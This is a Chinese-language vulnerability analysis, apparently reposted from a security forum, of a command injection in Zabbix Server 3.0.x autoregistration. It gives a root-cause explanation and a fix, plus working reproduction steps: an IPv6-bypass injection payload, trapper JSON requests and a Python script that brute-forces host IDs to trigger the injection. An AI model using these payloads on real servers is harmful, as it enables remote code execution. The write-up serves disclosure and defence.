> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码， 原文地址 [xz.aliyun.com](https://xz.aliyun.com/t/8991)

漏洞描述
----

Zabbix Server 的 trapper 命令处理，存在命令注入漏洞，可导致远程代码执行。

漏洞影响
----

远程代码执行  
CVSSv3 Score  
9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H  
AC: HIGH 需要服务端配置开启自动注册，或者 Zabbix Proxy（会认证主机名）自动发现。

影响版本
----

Zabbix 3.0.x~3.0.30  
[https://www.zabbix.com/cn/download?zabbix=3.0](https://www.zabbix.com/cn/download?zabbix=3.0)

漏洞分析
----

该漏洞原理与 CVE-2017-2824 相同，参考  
[https://talosintelligence.com/reports/TALOS-2017-0325](https://talosintelligence.com/reports/TALOS-2017-0325)  
active checks 是自动注册的命令字，自动注册的本意是 agent 可主动将主机注册给 server 进行监控，在 2.2.18 版本中可以在 IP 中注入（参见上文的版本分析处，2.2.19 版本才增加了 ip 校验）shell 命令。CVE-2017-2824 提到的漏洞在 discovery data 命令字即自动发现功能中，由于没有校验 IP，导致可在 IP 中写入 shell 命令，进而在执行 script cmd 时达到命令注入。  
比如在 IP 中写入内容

```
;touch /tmp/zabbix_pwned
```

那么执行 ping 命令时就变为

```
/bin/ping -c 3 ;touch /tmp/zabbix_pwned 2>&1
```

CVE-2017-2824 在 3.0.x 的修复办法是，对 IP 进行校验，代码如下：  
[![](https://xzfile.aliyuncs.com/media/upload/picture/20210106093015-ba412714-4fbe-1.png)](https://xzfile.aliyuncs.com/media/upload/picture/20210106093015-ba412714-4fbe-1.png)  
[![](https://xzfile.aliyuncs.com/media/upload/picture/20210106093112-dca2e11c-4fbe-1.png)](https://xzfile.aliyuncs.com/media/upload/picture/20210106093112-dca2e11c-4fbe-1.png)  
但是校验 IP 的方法可以被绕过，Ipv4 校验没问题，ipv6 校验可绕过:  
[![](https://xzfile.aliyuncs.com/media/upload/picture/20210106093148-f1b59720-4fbe-1.png)](https://xzfile.aliyuncs.com/media/upload/picture/20210106093148-f1b59720-4fbe-1.png)  
输入为 ffff:::;touch /tmp/1234pwn 即可绕过，进而实现命令注入。

漏洞复现
----

### 添加自动注册规则

访问 portal 登录，依次点击菜单 Configuration->Actions，将 Event source 调整为 Auto registration  
[![](https://xzfile.aliyuncs.com/media/upload/picture/20210106093226-08ab9c54-4fbf-1.png)](https://xzfile.aliyuncs.com/media/upload/picture/20210106093226-08ab9c54-4fbf-1.png)  
点击 Create action 后，第一个页签随便写一个名字  
[![](https://xzfile.aliyuncs.com/media/upload/picture/20210106093250-1705b67c-4fbf-1.png)](https://xzfile.aliyuncs.com/media/upload/picture/20210106093250-1705b67c-4fbf-1.png)  
第二个页签设置条件  
[![](https://xzfile.aliyuncs.com/media/upload/picture/20210106093316-2668a3fe-4fbf-1.png)](https://xzfile.aliyuncs.com/media/upload/picture/20210106093316-2668a3fe-4fbf-1.png)  
可配置 host name、proxy 和 host metadata 包含或不包含某个关键字，为了复现方便这里留空。  
第三个页签，指定操作，可以为发送消息、添加主机等，这里要选择 Add host。  
[![](https://xzfile.aliyuncs.com/media/upload/picture/20210106093347-38c240e6-4fbf-1.png)](https://xzfile.aliyuncs.com/media/upload/picture/20210106093347-38c240e6-4fbf-1.png)  
以上规则的意思就是任意自动注册的 host，没有任何拒绝规则，都会直接添加到 server 中。

### 注册 host

```
{"request":"active checks","host":"helloworld","ip":"ffff:::;touch /tmp/1234pwn"}
```

执行以上 trapper 命令，利用自动注册添加 host

### 暴破 hostid

利用 command 命令字，暴破得到上一步添加的 host 的 id

```
def doCmd(ip, cmd):
    s = remote(ip, 10051)

    #length = socket.htonl(len(cmd))
    length = len(cmd)
    payload = 'ZBXD' + '\x01' + p32(length) + p32(0) + cmd

    s.send(payload)
    rsp = s.recv(400)
    info = json.loads(rsp)['info']
    print info
    if info.startswith('Unknown Host ID'):
        s.close()
        return False
    s.close()
    return True
def hostid_bruteforce():
    for ip in ipList:
        try:
            for i in range(10000, 20000):
                cmd_fmt = '{"request":"command","scriptid":"3","hostid":"%d","nodeid":"0"}'
                cmd = cmd_fmt%i
                rsp = doCmd(ip, cmd)
                try:
                    r = json.loads(rsp)['response']
                    if r == 'success':
                        print 'hostid = %d' % i
                except Exception as e:
                    print e                    
        except Exception as e:
            print e


```

### 触发命令注入

```
{"request":"command","scriptid":"1","hostid":"10106","nodeid":"0"}

```

执行 ping 命令，在 server 主机生成 / tmp/1234pwn 文件，注入成功。

修复建议
----

正确限制 IP

附录
--

[https://support.zabbix.com/browse/ZBX-17600](https://cve.mitre.org/cgi-bin/cvename.cgi?>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11800</a><br>
<a href=)  
[https://support.zabbix.com/browse/ZBXSEC-30](https://support.zabbix.com/browse/ZBXSEC-30)